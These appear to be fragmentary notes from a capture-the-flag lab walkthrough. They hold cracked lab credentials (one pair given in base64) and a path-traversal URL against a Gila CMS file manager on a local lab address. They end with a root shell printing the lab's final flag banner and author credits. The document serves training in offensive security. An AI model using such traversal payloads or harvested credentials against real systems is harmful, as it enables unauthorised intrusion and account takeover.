

arjun.7z:family


base64: Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=
gila:admin@gmail.com:princesa




http://192.168.108.129/gila/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/index.php






/mnt # cat final.txt
cat final.txt

                                   ,╓,
                                   ╢▀╢
                                   ╟Ü╡
                                   ▓Ü╢
              ,╓,              ,,╓▄▓▓╣▄╓,,              ,╓,
              ║▓╙╣        ╓g▓▓╣╣╣╣╣╣▓╣╣╣╣╣╣▓▓æw        ╣╩║▓
                "▓╣ß╗,,g▓╣╣╣╣▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓╣╣╣╣▓W,,╥▓▓╢"
                  ▓▌▓▐╣╣╣▓▓▓╩▀'    ▓Ü▒     ╙╩▓▓▓╣╣╣▌▓]Ñ
                  ╒▓╣╣▓▓▓▀        /▓W║m        ╙▓▓▓╣╣▓╗
                 φ╣╣╣▓▓╩▓║@╖,     ╘▓µ╣╛     ,╓@▓║╜▓▓▓╣╣▓
                ▓╣╣▓▓▓   ▓U▓╓@     ▓Ü▒     Æ▓▓H╢`  ╚▓▓╣╣▓
               ▓╣╣▓▓▀     ╙▓▓╣╣,   ╠Ü║   ,▓▓╢Ñ╜     ╙▓▓╣╣▓
              ╒╣╣╣▓▓         ╙▓╬▓▓▓║╢╢▓▓▓▓║"         ╟▓╣╣╣▌
              ▓╣╣▓▓           Æ▓║╣▒▄▓▓▄╢╢▓▓           ▓▓╣╣▓
     ╔▓║╣]¢║╢╟▓▓╣▌╣]║╢╜φ╙╢║║¢U╣▒▒█▓▓▌██▌║Ü╣H¢╬▓▓▓φ▓▓▓¢╢▐╣▓▓▓▓▓@[╣║▓W
      "╙╙ '╙▀╝▓╣╣▓╣'╙╙▀Ü▓▀╙└" ▓▓▒╫███▓█▌╢╫╣'`""╙╩∩╝╙"`▓▓╣╣▓╙╜"` ╙╙"
              ╟╣╣╣▓L          ]▓▓║Ñ▒▒╣@╢▓▓L          ,▓▓╣╣▓
               ╣╣╣▓▓        ╓@╣▓"▀▓▓▓▓▓▀"║╣▓╦,       ▓▓╣╣╣"
               ╙╣╣╣▓▓    ╔╟║╠▓╜    ╟Ü▓    ╙╣╢▓▓φ    ▓▓╣╣╣▌
                ╙╣╣╣▓▓╖ g╢▓▓@"     ╢Ü╣      V╢║▓▓ ╓▓▓╣╣╣▀
                 "▓╣╣▓▓▓@▀        ╙╠▓▓$        ╙▒▓▓▓╣╣▓┘
                   ║▓▓╣▓▓▓&╖       ╣Ü╣`      ,φ▓▓▓╣▓▓▓r
                 ,╣╠▓Ç▓╣╣╣▓▓▓▓&æ╖,,║Ü▓,,╓g&▓▓▓▓╣╣╣▓Ü╢║▓ç
              ,@N╠╝"    ╙▓▓╣╣╣╣▓▓▓▓▓▓▓▓▓▓▓╣╣╣╣╣▓▀    `╨╣╝@,
              ▓▓║╜          "▀▀▓▓╣╣▓▓▓╣╣▓▓▀▀╙          ╙╣▓▓
    

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
Kavish Tyagi : https://twitter.com/Tyagi_kavish_


+-+-+-+-+-+ +-+-+-+-+-+-+-+
 |E|n|j|o|y| |H|A|C|K|I|N|G|
 +-+-+-+-+-+ +-+-+-+-+-+-+-+
____________________________________

